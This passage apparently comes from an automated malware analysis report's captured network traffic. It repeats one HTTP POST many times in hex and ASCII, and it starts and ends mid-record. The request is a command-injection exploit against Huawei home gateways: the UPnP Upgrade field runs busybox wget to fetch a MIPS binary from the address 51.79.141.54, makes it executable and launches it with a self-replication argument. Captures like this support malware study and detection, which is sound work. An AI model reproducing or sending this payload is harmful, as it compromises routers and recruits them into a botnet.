61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 